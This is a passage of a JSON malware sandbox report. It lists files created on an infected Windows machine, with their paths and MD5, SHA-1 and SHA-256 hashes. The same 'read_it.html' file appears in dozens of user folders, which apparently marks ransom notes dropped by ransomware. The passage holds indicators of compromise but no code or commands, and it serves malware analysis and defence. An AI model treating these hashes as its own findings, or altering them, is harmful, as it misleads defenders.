"sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "size": 0, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/619f68e3ee28c77522018ed6af5c877130464020", "file_type": "created_file", "id": "file_5", "md5_hash": "755f5c8f81c8cd181f27d7b5dbcd37f7", "norm_filename": "c:\\users\\public\\{846ee340-7039-11de-9d20-806e6f6e6963}", "sha1_hash": "619f68e3ee28c77522018ed6af5c877130464020", "sha256_hash": "fae73bded7d5ab96ea321b7a17a31d5816ae67bbbc8c37c3e370a1ef44242d1c", "size": 1026, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/ebe2275af3897092841d1199e5ac4f742563166c", "file_type": "created_file", "id": "file_7", "md5_hash": "a69d1ce732f370c4e3dbdc4b92a09694", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\ntuser.ini.4035", "sha1_hash": "ebe2275af3897092841d1199e5ac4f742563166c", "sha256_hash": "7258116174418acc346e6423bef9ab0de57c0ab329d22b7b867e07cfd9ab1e12", "size": 976, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_8", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_11", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_26", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_34", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\x8k-tb9nsgqij6\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_44", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\videos\\a0ewjzo0h70q\\urnkmksgaz1mrc-kzew\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_49", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\searches\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_53", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\saved games\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_55", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_66", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\pictures\\w7s1sef\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_67", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_68", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\music\\poibg_ey7m-ncykd\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_69", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\links\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_70", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_71", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\windows live\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_72", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\msn websites\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_73", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\microsoft websites\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_74", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\favorites\\links\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_75", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\downloads\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_76", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_77", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\_cbddoffkxknkhz\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_78", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\zexpz8sanmxx\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_79", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\outlook files\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_80", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_81", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\documents\\my shapes\\_private\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_82", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_83", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\pjq-ty1kqqwr93pndg\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_84", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\desktop\\52bi-hhj3zfu3m69\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_85", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\contacts\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_86", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_87", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_88", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_89", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\webapps\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_90", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\idb\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_91", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\bookmarkbackups\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_92", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\crash reports\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_93", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_94", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_95", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_96", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_97", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\jre1.7.0_60\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_98", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_99", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\deployment\\security\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_100", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\sun\\java\\au\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_101", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\locallow\\adobe\\acrobat\\10.0\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_102", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_103", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_104", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\~nsu.tmp\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_105", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_106", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\j34qd0io\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_107", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\793tk2yx\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_108", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\53xuaco8\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_109", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\temporary internet files\\content.ie5\\4pep48ks\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_110", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_111", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_112", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\tr\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_113", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\th\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "size": 4898, "type": "extracted_file", "version": 1 }, { "archive_path": "extracted_files/fbf640c02b23268c2b3a684b4455f904363fe22a", "file_type": "created_file", "id": "file_114", "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\sv\\read_it.html", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": 